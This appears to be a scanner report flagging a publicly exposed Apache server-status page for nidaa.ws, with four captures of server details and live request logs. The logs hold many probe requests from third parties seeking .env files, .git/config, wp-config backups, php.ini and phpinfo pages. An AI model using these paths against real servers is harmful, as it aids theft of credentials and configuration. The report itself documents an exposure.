Domain nidaa.ws
The Netherlands
CLOUDFLARENET
Software information

cloudflare cloudflare

tcp/443 tcp/80

  • Apache server-status page is publicly available
    IP: 188.114.97.9
    Domain: nidaa.ws
    Port: 80
    URL: http://nidaa.ws
    First seen 2024-03-28 06:00
    Last seen 2024-06-20 23:38
    Open for 84 days
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7a639d01b

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Friday, 21-Jun-2024 02:38:32 +03
      Restart Time: Tuesday, 11-Jun-2024 04:03:04 +03
      Parent Server Config. Generation: 6
      Parent Server MPM Generation: 5
      Server uptime:  9 days 22 hours 35 minutes 27 seconds
      Server load: 0.11 0.07 0.06
      Total accesses: 849784 - Total Traffic: 94.4 GB - Total Duration: 1885478341
      CPU Usage: u484.67 s35.68 cu3719.52 cs769.29 - .583% CPU load
      .989 requests/sec - 115.3 kB/second - 116.5 kB/request - 2218.77 ms/request
      11 requests currently being processed, 0 workers gracefully restarting, 239 idle workers
      _________________________.........................______________
      _K_________........................._______K____________________
      _________K__________________________________K________K__________
      ____________________K______________________R__W_______W_________
      ________K__________________K________________....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-5154470/84/3835_
      6.303310304493170.00.88377.41
      66.249.66.82http/1.1albayan.edu.sa:80GET /imgweb/cur1438/5-2/hadex.pdf HTTP/1.1
      
      0-5154470/43/3447_
      6.25720113782290.02.59345.00
      139.59.132.8http/1.1akgsa.com:443GET /about HTTP/1.1
      
      0-5154470/26/3412_
      6.2187290535603360.09.70458.88
      66.249.66.81http/1.1albayan.edu.sa:443GET /imgweb/lib2/bahjat-nazren3.pdf HTTP/1.1
      
      0-5154470/47/3602_
      6.0668477195420.01.92277.80
      104.156.155.21http/1.1
      
      0-5154470/101/3740_
      6.27531618751630.03.31377.21
      45.148.10.59http/1.13dvi.com:443GET /js/Front/app.js HTTP/1.1
      
      0-5154470/35/3455_
      6.07682113729190.00.74448.06
      104.156.155.21http/1.1
      
      0-5154470/91/3879_
      6.32190476921600.03.36316.45
      40.77.167.28http/1.1albayan.edu.sa:443GET /web/334.html2 HTTP/1.1
      
      0-5154470/52/3706_
      6.160111533280.02.94308.59
      45.84.89.2http/1.1
      
      0-5154470/48/3485_
      5.9572319295310.04.31225.05
      139.59.132.8http/1.1
      
      0-5154470/43/3490_
      6.25719128300920.03.62641.33
      139.59.132.8http/1.1akgsa.com:443GET /.git/config HTTP/1.1
      
      0-5154470/37/3615_
      6.23775110515660.00.62343.72
      172.105.158.219http/1.1white-petals.com:80GET /login.action HTTP/1.1
      
      0-5154470/51/3442_
      6.3130039815745640.022.52424.60
      66.249.66.204http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2021/12/1E3A0852-scaled.jpg HTTP/1.1
      
      0-5154470/34/3485_
      6.02685493798440.02.27237.69
      104.156.155.21http/1.1
      
      0-5154470/38/3777_
      6.32165611583260.02.06264.70
      94.156.68.3http/1.1zed.sa:80GET /cloud.php HTTP/1.1
      
      0-5154470/46/3790_
      6.24731324914080.01.62654.94
      138.201.201.48http/1.1zed.sa:80POST /wp-cron.php?doing_wp_cron=1718925980.83199691772460937500
      
      0-5154470/50/3705_
      6.31228288445490.02.42341.27
      3.224.220.101http/1.1jilani.com.sa:80GET /en HTTP/1.1
      
      0-5154470/30/3574_
      6.2278034532850.09.48303.01
      172.105.158.219http/1.1php.we3dvi.com:80\x16\x03\x01\x01\x03\x01
      
      0-5154470/30/3534_
      6.07683511849950.04.17374.01
      104.156.155.21http/1.1
      
      0-5154470/34/3331_
      6.247601956347610.03.83347.20
      87.250.224.80http/1.1daris.live:443GET /assets/default/stylesheets/vendor/mdi/fonts/materialdesign
      
      0-5154470/43/2948_
      6.3041827599400.01.42359.02
      5.82.91.80http/1.1albayan.edu.sa:443GET /school/school/image_max/web/image_news/logo_school.png HTT
      
      0-5154470/78/3341_
      6.086805848375290.04.74342.68
      104.156.155.21http/1.1
      
      0-5154470/45/3608_
      6.284342579511180.05.87247.95
      5.82.91.80http/1.1albayan.edu.sa:443GET /imgweb/files39/10.jpg HTTP/1.1
      
      0-5154470/83/3642_
      6.22827545412940.02.20364.55
      5.255.231.3http/1.1daris.live:443GET /assets/default/404/css/bootstrap.css HTTP/1.1
      
      0-5154470/29/3358_
      6.26613210285170.02.18469.96
      66.249.66.81http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      0-5154470/28/3756_
      6.178845115076820.01.93329.13
      87.250.224.229http/1.1daris.live:443GET /assets/default/vendor/justgage/raphael-2.1.4.min.js HTTP/1
      
      1-5-0/0/3552.
      0.0092546635759810.00.00450.55
      172.71.102.67http/1.1qr.brunch.ws:443GET /storage/food_image/17088494201379_img3d0559256f09407291a00
      
      1-5-0/0/3113.
      0.009254198069520.00.00370.99
      128.234.116.248http/1.1jawad.com.sa:443POST /api/v.1/front/visitor/count HTTP/1.1
      
      1-5-0/0/3486.
      0.0092542627254860.00.00283.99
      172.71.103.48http/1.1qr.brunch.ws:443GET /storage/food_image/17085203627110_imgba5677885d994e3f8d943
      
      1-5-0/0/3402.
      0.00925468069700.00.00195.64
      172.71.103.79http/1.1qr.brunch.ws:443GET /storage/dark_logo/17084449424487_group6395.png HTTP/1.1
      
      1-5-0/0/3575.
      0.00925437974660.00.00260.60
      172.71.99.8http/1.1qr.brunch.ws:443GET /storage/food_image/17162864712835_mocha.jpg HTTP/1.1
      
      1-5-0/0/3452.
      0.00925449792970.00.00393.61
      128.234.116.248http/1.1jawad.com.sa:443GET /favicon.ico HTTP/1.1
      
      1-5-0/0/3477.
      0.009254411760290.00.00858.76
      172.71.183.111http/1.1qr.brunch.ws:443GET /storage/food_image/17088535992345_img87d03a054fb04c81a8cc3
      
      1-5-0/0/3165.
      0.00925426117150.00.00292.75
      141.101.76.23http/1.1qr.brunch.ws:443GET /storage/food_image/17088551141700_img60db9211a02345f08b4a9
      
      1-5-0/0/3527.
      0.009254207913420.00.00334.79
      162.158.87.136http/1.1
      Found on 2024-06-20 23:38
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7236bce2f

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Thursday, 20-Jun-2024 08:47:14 +03
      Restart Time: Tuesday, 11-Jun-2024 04:03:04 +03
      Parent Server Config. Generation: 6
      Parent Server MPM Generation: 5
      Server uptime:  9 days 4 hours 44 minutes 9 seconds
      Server load: 0.35 0.33 0.22
      Total accesses: 763730 - Total Traffic: 86.9 GB - Total Duration: 1792407127
      CPU Usage: u457.63 s34.8 cu3348.78 cs699.58 - .571% CPU load
      .961 requests/sec - 114.6 kB/second - 119.3 kB/request - 2346.91 ms/request
      10 requests currently being processed, 0 workers gracefully restarting, 240 idle workers
      ________________K_____________________K___________..............
      ..........._________________K__________________K_____K________K_
      _______________________K________________________________________
      ___________K____________________________________W_______________
      ______________K____.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-574350/36/3398_
      6.5117626303929190.01.45342.52
      122.227.246.34http/1.1akg.sa:443GET /akg.sa/.env HTTP/1.1
      
      0-574350/38/2974_
      6.5512791612587660.01.26327.63
      52.230.152.223http/1.1zed.sa:80GET /?add-to-cart=3232 HTTP/1.1
      
      0-574350/46/3066_
      6.5214196934850200.00.83422.57
      52.230.152.223http/1.1zed.sa:80GET /?add-to-cart=3274 HTTP/1.1
      
      0-574350/40/3214_
      6.58114216868330.019.19267.85
      122.227.246.34http/1.1akg.sa:443GET /resources/.env HTTP/1.1
      
      0-574350/45/3350_
      6.622227976940.00.66365.17
      122.227.246.34http/1.1akgsa.com:443GET /akgsa.com/.env HTTP/1.1
      
      0-574350/41/3009_
      6.631129244550.02.20415.42
      122.227.246.34http/1.1akgsa.com:443GET /configurations/.env HTTP/1.1
      
      0-574350/54/3366_
      6.51160365892000.04.63297.76
      122.227.246.34http/1.1akg.sa:443GET /akg.sa/.env HTTP/1.1
      
      0-574350/66/3337_
      6.60653610697220.06.80284.04
      122.227.246.34http/1.1akg.sa:443GET /akg.sa/.env HTTP/1.1
      
      0-574350/38/3083_
      6.57122228589800.01.26203.38
      122.227.246.34http/1.1akg.sa:443GET /akg.sa/.env HTTP/1.1
      
      0-574350/70/3180_
      6.641218449210.01.20613.52
      122.227.246.34http/1.1akgsa.com:443GET /akgsa.com/.env HTTP/1.1
      
      0-574350/67/3313_
      6.599929243680.03.60330.62
      122.227.246.34http/1.1akgsa.com:443GET /akgsa.com/.env HTTP/1.1
      
      0-574350/43/3193_
      6.521491812267900.01.59393.01
      122.227.246.34http/1.1akg.sa:443GET /akg.sa/.env HTTP/1.1
      
      0-574350/53/3109_
      6.6228093138650.03.57207.38
      122.227.246.34http/1.1akgsa.com:80GET /config/.env HTTP/1.1
      
      0-574350/95/3435_
      6.50179217895410.01.82235.21
      122.227.246.34http/1.1akg.sa:443GET /.env.bak HTTP/1.1
      
      0-574350/34/3317_
      6.6073024431380.01.40632.43
      122.227.246.34http/1.1akg.sa:80GET /tmp/.env HTTP/1.1
      
      0-574350/36/3382_
      6.5114908065970.00.61328.92
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=4&q=614&t=167.114.116.25&c=5 HTT
      
      0-574351/62/3263K
      6.65024063220.81.95274.03
      162.158.87.78http/1.1nidaa.ws:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-574350/39/3159_
      6.59862411384670.01.84358.33
      122.227.246.34http/1.1akg.sa:443GET /temp/.env HTTP/1.1
      
      0-574350/44/3076_
      6.5810705964740.09.26259.28
      122.227.246.34http/1.1akgsa.com:80GET /audio/.env HTTP/1.1
      
      0-574350/34/2666_
      6.5213507243090.00.50347.54
      122.227.246.34http/1.1akgsa.com:80GET /akgsa.com/.env HTTP/1.1
      
      0-574350/54/2977_
      6.61542846345360.01.78327.24
      122.227.246.34http/1.1akgsa.com:443GET /conf/.env HTTP/1.1
      
      0-574350/47/3173_
      6.624129089790.03.32223.05
      122.227.246.34http/1.1akgsa.com:443GET /akgsa.com/.env HTTP/1.1
      
      0-574350/40/3212_
      6.55133295059590.00.72349.01
      127.0.0.1http/1.1php.we3dvi.com:80GET /whm-server-status HTTP/1.0
      
      0-574350/65/3082_
      6.5214609961960.02.65457.45
      122.227.246.34http/1.1akgsa.com:443GET /library/.env HTTP/1.1
      
      0-574350/33/3222_
      6.511641614109500.00.77314.18
      122.227.246.34http/1.1akg.sa:443GET /.env.old HTTP/1.1
      
      1-578690/42/3340_
      6.72148943635243590.00.54437.58
      52.230.152.223http/1.1zed.sa:80GET /?add-to-cart=4276 HTTP/1.1
      
      1-578690/65/2973_
      6.7311607208220.03.30357.72
      122.227.246.34http/1.1akg.sa:80GET /resources/.env HTTP/1.1
      
      1-578690/45/3276_
      6.78501626983610.00.78268.01
      122.227.246.34http/1.1akgsa.com:443GET /akgsa.com/.env HTTP/1.1
      
      1-578690/34/3250_
      6.721359307345130.00.60183.78
      52.230.152.223http/1.1zed.sa:80GET /?add-to-cart=3227 HTTP/1.1
      
      1-578690/46/3322_
      6.785707764960.055.06254.92
      122.227.246.34http/1.1akgsa.com:80GET /conf/.env HTTP/1.1
      
      1-578690/32/3203_
      6.7214109589810.00.55333.14
      122.227.246.34http/1.1akg.sa:80GET /akg.sa/.env HTTP/1.1
      
      1-578690/37/3273_
      6.751122511289580.00.99849.19
      122.227.246.34http/1.1akg.sa:443GET /akg.sa/.env HTTP/1.1
      
      1-578690/73/2986_
      6.7610325870940.02.03284.93
      122.227.246.34http/1.1akgsa.com:443GET /audio/.env HTTP/1.1
      
      1-578690/60/3211_
      6.7215506918040.054.71314.52
      138.201.201.48http/1.1zed.sa:80POST /wp-cron.php?doing_wp_cron=1718862279.06210994720458984375
      
      1-578690/65/3204_
      6.711702464340</
      Found on 2024-06-20 05:47
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7802ee7f5

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Tuesday, 18-Jun-2024 21:56:53 +03
      Restart Time: Tuesday, 11-Jun-2024 04:03:04 +03
      Parent Server Config. Generation: 6
      Parent Server MPM Generation: 5
      Server uptime:  7 days 17 hours 53 minutes 48 seconds
      Server load: 0.03 0.05 0.05
      Total accesses: 652159 - Total Traffic: 74.4 GB - Total Duration: 1648003949
      CPU Usage: u343.29 s20.97 cu2864.67 cs607.09 - .573% CPU load
      .974 requests/sec - 116.6 kB/second - 119.7 kB/request - 2527 ms/request
      18 requests currently being processed, 0 workers gracefully restarting, 207 idle workers
      _____KK_____________K_____K__K__________________________K______K
      _____________________K____K_________________KK__________________
      ___K_K________________...................................W......
      ........_______K__________K_______K_W_____________________......
      ............................................__K_________________
      _____...........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      <SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-583370/6/2847_
      1.391143302441750.01.23302.89
      172.70.158.146http/1.1qr.brunch.ws:443GET /storage/food_image/17088467698345_imgfd714000cd744b48999f7
      
      0-583370/12/2456_
      1.50426558391030.00.10277.29
      194.163.154.75http/1.1zed.sa:443GET /wp-login.php HTTP/1.1
      
      0-583370/23/2526_
      1.5437333143590.01.73345.14
      5.163.68.180http/1.1sulaimaniya.edu.sa:443GET /wp-content/plugins/revslider/public/assets/js/extensions/r
      
      0-583370/12/2613_
      1.48101233751550.00.19212.13
      52.70.240.171http/1.1akg.sa:443GET /robots.txt HTTP/1.1
      
      0-583370/11/2787_
      1.542135664550.00.14341.43
      66.249.66.39http/1.1hawsab.me:80GET /?zgr19662qvmyuy603.html HTTP/1.1
      
      0-583376/15/2442K
      1.6207033535645392.75.45357.91
      66.249.66.82http/1.1albayan.edu.sa:443GET /albayan_library/upload/books/__________%20______________%2
      
      0-5833710/17/2802K
      1.6403493673425.10.58253.57
      5.163.68.184http/1.1sulaimaniya.edu.sa:443GET /wp-content/plugins/contact-form-7/includes/css/styles-rtl.
      
      0-583370/7/2846_
      1.27269378918120.00.14246.22
      151.255.47.1http/1.1garndhabi.org:80GET /api/v1/contact/social-icon HTTP/1.1
      
      0-583370/7/2572_
      1.27194533608880.00.18160.26
      151.255.47.1http/1.1garndhabi.org:80GET /api/v1/contact/social-icon HTTP/1.1
      
      0-583370/7/2543_
      1.052784214116830.00.84544.59
      199.45.154.142http/1.1
      
      0-583370/13/2767_
      1.4511067213830.01.83271.11
      172.70.158.157http/1.1qr.brunch.ws:443GET /storage/food_image/17088460069724_oip7.jpg HTTP/1.1
      
      0-583370/30/2708_
      1.4011259461770.02.38347.12
      172.70.158.148http/1.1qr.brunch.ws:443GET /storage/food_image/17096771367772_fajita.webp HTTP/1.1
      
      0-583370/8/2490_
      1.29173290936210.00.18169.36
      51.252.180.150http/1.1jawad.com.sa:443GET /public/front_resources/css/bootstrap-rtl.min.css HTTP/1.1
      
      0-583370/5/2641_
      1.2915345385890.00.03188.13
      66.249.66.40http/1.1hawsab.me:80GET /?ben6765ojhlgwi525.html HTTP/1.1
      
      0-583370/4/2846_
      1.07262679179980.00.23516.39
      167.94.138.36http/1.1
      
      0-583370/10/2862_
      1.4111226632590.00.03287.19
      172.70.158.130http/1.1qr.brunch.ws:443GET /storage/food_image/17096770987078_minibeefburger.webp HTTP
      
      0-583370/6/2687_
      1.4211122902560.04.42228.41
      172.70.158.154http/1.1qr.brunch.ws:443GET /storage/food_image/17096788077812_carrot.webp HTTP/1.1
      
      0-583370/13/2575_
      1.49673886362200.00.89324.25
      172.70.158.149http/1.1qr.brunch.ws:443GET /dar-zed?fbclid=PAZXh0bgNhZW0CMTEAAaYaxO9fQsIdnADw239JpojsK
      
      0-583370/6/2561_
      1.4611024715140.00.19216.72
      172.70.158.135http/1.1qr.brunch.ws:443GET /storage/vendor_settings/17085246857302_group6395.png HTTP/
      
      0-583370/10/2191_
      1.4311034756020.00.02301.06
      172.70.158.159http/1.1qr.brunch.ws:443GET /storage/food_image/17162858719396_iceespresso.jpg HTTP/1.1
      
      0-583371/11/2471K
      1.6402845653177.50.07300.37
      5.163.68.184http/1.1sulaimaniya.edu.sa:443GET /wp-content/plugins/rdv-timetable/css/schedule.css?ver=6.5.
      
      0-583370/57/2649_
      1.4011366736850.00.07187.51
      172.70.158.159http/1.1qr.brunch.ws:443GET /storage/food_image/17096783054077_trio.webp HTTP/1.1
      
      0-583370/9/2467_
      1.4611063267840.00.05263.23
      172.70.158.157http/1.1qr.brunch.ws:443GET /storage/food_image/17088461776104_oip7.jpg HTTP/1.1
      
      0-583370/7/2447_
      1.3911438942970.00.16435.46
      172.70.158.151http/1.1qr.brunch.ws:443GET /storage/food_image/17088545873529_img2293f7867d0c47e8adef6
      
      0-583370/7/2656_
      1.4511059852110.00.03219.94
      172.70.158.159http/1.1qr.brunch.ws:443GET /storage/food_image/17162862904287_cappuccino.jpg HTTP/1.1
      
      1-583670/15/2959_
      1.498029634295620.00.47403.55
      151.255.47.1http/1.1garndhabi.org:80GET /api/v1/contact/social-icon HTTP/1.1
      
      1-583671/9/2621K
      1.620065507466.64.07325.46
      172.68.110.121http/1.1nidaa.ws:80GET / HTTP/1.1
      
      1-583670/9/2815_
      1.47109114626516950.00.42247.83
      54.88.179.33http/1.1wahaj.thenewjeddah.com:443GET / HTTP/1.1
      
      1-583670/57/2790_
      1.4911056698120.00.44160.74
      172.70.158.135http/1.1qr.brunch.ws:443GET /storage/food_image/17162865913767_raspberrypistachioespres
      
      1-583671/9/2800K
      1.63016276920.80.03159.75
      172.70.246.80http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      1-583670/10/2708_
      1.3117907035830.00.16285.91
      66.249.66.81http/1.1albayan.edu.sa:80GET /albayan_library/BooksVi.php?b=156 HTTP/1.1
      
      1-583670/18/2894_
      1.6128235710175810.00.64324.89
      5.163.52.190http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2021/12/1E3A0778-scaled.jpg HTTP/1.1
      Found on 2024-06-18 18:56
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df726f353dc

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Tuesday, 18-Jun-2024 04:59:23 +03
      Restart Time: Tuesday, 11-Jun-2024 04:03:04 +03
      Parent Server Config. Generation: 6
      Parent Server MPM Generation: 5
      Server uptime:  7 days 56 minutes 18 seconds
      Server load: 0.11 0.07 0.05
      Total accesses: 582650 - Total Traffic: 70.1 GB - Total Duration: 1630458730
      CPU Usage: u316.92 s19.57 cu2578 cs557.1 - .571% CPU load
      .958 requests/sec - 120.9 kB/second - 126.2 kB/request - 2798.35 ms/request
      8 requests currently being processed, 0 workers gracefully restarting, 142 idle workers
      __K_____________________K________________________K_______W______
      ___________.....................................................
      ......................_________________K_______.................
      ........____________K_____K______________________K________......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-532920/18/2531_
      3.59401299706330.00.59264.66
      4.178.106.56http/1.1garndhabi.org:443GET /server/s3.js HTTP/1.1
      
      0-532920/48/2192_
      3.604018157990.02.32263.09
      4.178.106.56http/1.1garndhabi.org:443GET /wp-config.txt HTTP/1.1
      
      0-532921/15/2074K
      3.680132692250.90.84333.60
      172.70.111.91http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      0-532920/25/2288_
      3.652313321050.07.02181.60
      4.178.106.56http/1.1garndhabi.org:443GET /test_phpinfo4.php HTTP/1.1
      
      0-532920/16/2497_
      3.682005324910.00.60330.98
      4.178.106.56http/1.1garndhabi.org:443GET /build.php HTTP/1.1
      
      0-532920/20/2068_
      3.672213176960.01.26328.02
      4.178.106.56http/1.1garndhabi.org:443GET /phpsysinfo.php HTTP/1.1
      
      0-532920/18/2440_
      3.633814246780.00.69218.06
      4.178.106.56http/1.1garndhabi.org:443GET /apache/info.php HTTP/1.1
      
      0-532920/18/2546_
      3.623813659320.00.75219.46
      4.178.106.56http/1.1garndhabi.org:443GET /_profiler/phpinfo/phpinfo.php HTTP/1.1
      
      0-532920/38/2304_
      3.682103238380.05.11142.78
      4.178.106.56http/1.1garndhabi.org:443GET /admin/phpinfo.php HTTP/1.1
      
      0-532920/19/2240_
      3.6810013300500.02.61479.04
      173.249.40.22http/1.13dvi.com:80GET / HTTP/1.1
      
      0-532920/23/2470_
      3.574217005380.01.01260.18
      4.178.106.56http/1.1garndhabi.org:443GET /qq.php HTTP/1.1
      
      0-532920/29/2303_
      3.554319185150.00.46310.71
      4.178.106.56http/1.1garndhabi.org:443GET /php-info.php HTTP/1.1
      
      0-532920/41/2134_
      3.5841188463330.03.27161.98
      4.178.106.56http/1.1garndhabi.org:443GET /test8.php HTTP/1.1
      
      0-532920/13/2283_
      3.564214465470.00.88177.26
      4.178.106.56http/1.1garndhabi.org:443GET /phpinfo.php4 HTTP/1.1
      
      0-532920/13/2500_
      3.564318698920.08.02497.86
      4.178.106.56http/1.1garndhabi.org:443GET /infophp.php HTTP/1.1
      
      0-532920/64/2511_
      3.672204492380.03.27268.94
      4.178.106.56http/1.1garndhabi.org:443GET /.phpinfo HTTP/1.1
      
      0-532920/13/2409_
      3.643612641550.00.96216.98
      4.178.106.56http/1.1garndhabi.org:443GET /test_info5.php HTTP/1.1
      
      0-532920/14/2209_
      3.584116020280.02.08313.31
      4.178.106.56http/1.1garndhabi.org:443GET /php.ini HTTP/1.1
      
      0-532920/14/2318_
      3.613914337400.01.02208.27
      4.178.106.56http/1.1garndhabi.org:443GET /devs.php HTTP/1.1
      
      0-532920/72/1964_
      3.633714486510.03.25291.05
      4.178.106.56http/1.1garndhabi.org:443GET /info3.php HTTP/1.1
      
      0-532920/16/2136_
      3.64361843718730.00.31265.48
      4.178.106.56http/1.1garndhabi.org:443GET /o.php HTTP/1.1
      
      0-532920/14/2282_
      3.652316400940.00.59169.14
      4.178.106.56http/1.1garndhabi.org:443GET /ocp.php HTTP/1.1
      
      0-532920/21/2219_
      3.574212988030.00.95252.75
      4.178.106.56http/1.1garndhabi.org:443GET /test2.php HTTP/1.1
      
      0-532920/16/2101_
      3.623918567940.02.10402.80
      4.178.106.56http/1.1garndhabi.org:443GET /of.php HTTP/1.1
      
      0-532921/19/2245K
      3.68118850000.80.24210.56
      172.70.111.111http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      1-564140/9/2511_
      2.44421633879060.00.45390.59
      4.178.106.56http/1.1garndhabi.org:443GET /wp-config.old HTTP/1.1
      
      1-564140/8/2235_
      2.434216172580.00.18308.25
      4.178.106.56http/1.1garndhabi.org:443GET /pi.php5 HTTP/1.1
      
      1-564140/9/2559_
      2.41441625583280.00.18239.13
      4.178.106.56http/1.1garndhabi.org:443GET /linusadmin-phpinfo.php HTTP/1.1
      
      1-564140/9/2254_
      2.522316136700.00.34144.44
      4.178.106.56http/1.1garndhabi.org:443GET /p.php HTTP/1.1
      
      1-564140/12/2275_
      2.512415903310.00.19150.80
      4.178.106.56http/1.1garndhabi.org:443GET /test_phpinfo3.php HTTP/1.1
      
      1-564140/9/2354_
      2.522205590040.00.18245.67
      4.178.106.56http/1.1garndhabi.org:443GET /?phpinfo.php HTTP/1.1
      
      1-564140/10/2566_
      2.424319627710.010.85295.46
      4.178.106.56http/1.1garndhabi.org:443GET /123.php HTTP/1.1
      
      1-564140/11/2193_
      2.532104359170.00.16221.04
